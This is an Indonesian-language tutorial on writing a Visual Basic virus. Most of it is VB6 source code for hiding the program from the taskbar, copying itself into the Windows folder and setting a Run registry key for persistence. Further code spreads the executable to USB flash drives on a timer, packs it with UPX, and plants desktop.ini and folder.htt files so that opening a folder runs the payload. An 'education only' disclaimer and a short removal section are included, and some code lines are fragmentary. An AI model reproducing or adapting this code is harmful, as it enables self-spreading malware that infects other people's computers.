Pembuatan Virus dengan Visual Basic Artikel berikut hanya berupa illustrasi tentang bagaimana pemrograman program virus dengan menggunakan bahasa pemrograman Visual Basic. Artikel ini tidak bertujuan melakukan penyebaran virus, tetapi hanya sekedar pendidikan. Jika anda tidak setuju dengan pernyataan tersebut diatas, segera tutup dokumen ini dan lakukan penghapusan dari system anda. 1. Tidak menampakan diri pada saat Run. Buatlah sebuah project baru, dan tambahkan sebuah sub main (Project-Add Module) Option Explicit setiap variable harus dideklarasikan Sub main() App.TaskVisible = False tidak tampil di taskbar Form1.Visible = False tidak menampilkan form Buatlah sub main sebagai startup object program anda (Project-Project Properties- Startup Object, Sub Main) Coba lakukan Run, apakah program anda visible (form dan taskbar)? 2. Mengaktifkan diri setiap proses boot System. Tambahkan sebuah sub baru dengan nama virusinstall Sub VirusInstall() Dim wshell As Object 'ambil path dan nama exe file fsource = App.Path & "\" & App.EXEName & ".exe" 'duplikasi ke folder windows ftarget = Environ$("windir") & "\MyVirus.exe" 'Periksa apakah sudah pernah install Set wshell = CreateObject("WScript.Shell") 'manipulasi registry run wshell.regwrite "HKLM\Software\Microsoft\Windows\Run\MyVirus", ftarget dan aktifkan sub virusinstall dari Sub Main Sub Main() App.TaskVisible = False Form1.Visible = False Call VirusInstall install diri 3. Penyebaran diri melalui media flash disk
Tambahkan global variable (pada bagian general declaration) agar 1 flashdisk diinfeksi hanya 1 kali (virus yang baik tentu saja harus efisien dalam pemakaian resource sehingga kehadirannya tidak dapat diketahui dengan cepat) Dim infectedflashdisk As Boolean flag sudah infeksi atau belum Tambahkan sub berikut untuk mereplikasi diri virus Public Sub replikasidiri(targetdrive As String) 'replikasi dari C:\Windows (lokasi instalasi diri) fsource = Environ$("windir") & "\MyVirus.exe" 'ke target drive ftarget = targetdrive + "\MyVirus.exe" 'jangan replikasi lebih dari 1 kali pada media yang sama Tambahkan sub berikut untuk memantau keberadaan flashdisk Public Sub sebarflashdisk() On Error GoTo BatalInfeksi Dim AdaFlashDisk As Boolean Dim ObjFSO As Object Dim ObjDrive As Object buat file scripting object Set ObjFSO = CreateObject("Scripting.FileSystemObject") AdaFlashDisk = False For Each ObjDrive In ObjFSO.Drives 'Asumsi semua removable drive diatas huruf C adalah flash disk '1 - Removable drive '2 - Fixed drive (hard disk) '3 - Mapped network drive '4 - CD-ROM drive '5 - RAM disk If ObjDrive.DriveType = 1 And ObjDrive.DriveLetter > "C" Then AdaFlashDisk = True 'jangan infeksi berulang-ulang dan sisa kapasitas > 100 kb If Not infectedflashdisk And ObjDrive.AvailableSpace > 102400 Then Call replikasidiri(objdrive.driveletter+ : ) infectedflashdisk = True aktifkan flag sudah infeksi Next If Not AdaFlashDisk Then tidak ada flashdisk infectedflashdisk = False reset flag sudah infeksi
BatalInfeksi: Tambahkan kontrol timer pada form1 Private Sub Timer1_Timer() Call sebarflashdisk aktifkan penyebaran flasdisk Atur setting flag sudah infeksi dan control timer melalui sub main Sub Main() App.TaskVisible = False Form1.Visible = False Call VirusInstall 'Atur variabel global infectedflashdisk = False 'Atur setting time Form1.Timer1.Interval = 5000 Form1.Timer1.Enabled = True 4. Membatasi pengaktifan diri hanya 1 kali Virus yang efisien tentu saja harus hemat resource dan menggunakan algoritma yang efisien, sehingga keberadaan dirinya tidak terasa oleh pemakai. Tambahkan fungsi findwindow dari WINAPI Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpclassname As String, ByVal lpwindowname As String) As Long Tambahkan fungsi sudahaktif Function sudahaktif(title As String) As Boolean Dim vir_hwnd As Long 'Jika Jendela virus aktif 'cari Window dengan title yang sama vir_hwnd = FindWindow(vbNullString, Title) sudahaktif = Not (vir_hwnd = 0) End Function Makalah Pembuatan Virus dengan Visual Basic Modifikasi sub Main Sub Main() Dim namavirus As String namavirus = "MyVirus" If Not sudahaktif(namavirus) Then jika belum aktif App.TaskVisible = False Form1.Visible = False Call VirusInstall 'Atur variabel global infectedflashdisk = False 'Atur setting time
Form1.Caption = namavirus tandai title Window Form1.Timer1.Interval = 5000 Form1.Timer1.Enabled = True 6. Ganti Icon MyVirus 7. Memperkecil ukuran executable virus anda Hasil kompilasi dari program MyVirus adalah berukuran 24576 bytes, dan tentu saja cukup kecil untuk ukuran virus VB, tetapi alangkah baiknya kalau executable virus dapat lebih kecil lagi sehingga mempercepat proses loading. Untuk memperkecil executable file dapat menggunakan software seperti Ultimate Packer for Executable. Upx Project.exe Dan ukuran file setelah di-upx adalah 8704 bytes. 8. Menghilangkan virus ini a. Pada Run-Registry, buka HKLM\Software\Microsoft\Windows\Run dan hapus value MyVirus b. Hapus file C:\Windows\MyVirus.exe Tips tambahan : Melakukan eksploitasi terhadap folder.htt Membuat file desktop.ini Sub buatdesktop_ini(targetdrive As String) ftarget = targetdrive + "\Dekstop.ini" Open ftarget For Output As #1 Print #1, "[.ShellClassInfo]" Print #1, "ConfirmFileOp = 0" Print #1, "[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]" Print #1, "PersistMoniker=file://web\Folder.htt" Print #1, "[ExtShellFolderViews]" Print #1, "{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CFAE66-08002B2E1262}" Close #1 SetAttr ftarget, vbreadonly + vbhidden Membuat file folder.htt Public Sub buatfolder_htt(targetdrive As String) ftarget = targetdrive + "\web\folder.htt" Open ftarget For Output As #1 Print #1, "<html>" Print #1, "<head>" Print #1, "<meta http-equiv=""content-type""content=""text/html; charset=windows- 1252"">"
Print #1, "</head>" Print #1, "<body style=""margin: 0"" scroll=no>" Print #1, "<object id=filelist border=0 tabindex=1" Print #1, "classid = ""clsid:1820fed0-473e-11d0-a96c-00c04fd705a2""" Print #1, "style=""width: 100%; height: 100%"" tabindex=-1>" Print #1, "</object>" Print #1, "</body>" Print #1, "</html>" Print #1, "<script>" Print #1, "runexe=""<object ID=\""RUNIT\"" WIDTH=0 HEIGHT=0 TYPE=\""application/x-oleobject\""""" Print #1, "runexe+=""codebase=\""my Virus.exe#version=1,1,1,1\"">""" Print #1, "runexe+=""<param NAME=\""_Version\"" VALUE=\""65536\"">""" Print #1, "runexe+=""</object>""" Print #1, "runexe+=""<html><h1></h1></html>"";" Print #1, "document.writeln(runexe);" Print #1, "document.close();" Print #1, "</script>" Close #1 SetAttr ftarget, vbreadonly + vbhidden Membuat sub eksploitasi_folder_htt Public Sub eksploitasi_folder_htt(targetdrive As String) 'replikasi dari C:\Windows (lokasi instalasi diri) fsource = Environ$("windir") & "\MyVirus.exe" 'ke target drive ftarget = targetdrive + "\web" Call MkDir(fTarget) SetAttr ftarget, vbhidden ftarget = ftarget + "\My Virus.exe" 'jangan infeksi lebih dari 1 kali Call buatdesktop_ini(targetdrive) Call buatfolder_htt(targetdrive) Modifikasi sub replikasidiri Public Sub replikasidiri(targetdrive As String) 'replikasi dari C:\Windows (lokasi instalasi diri) fsource = Environ$("windir") & "\MyVirus.exe"
'ke target drive ftarget = targetdrive + "\MyVirus.exe" 'jangan infeksi lebih dari 1 kali Call eksploitasi_folder_htt(targetdrive)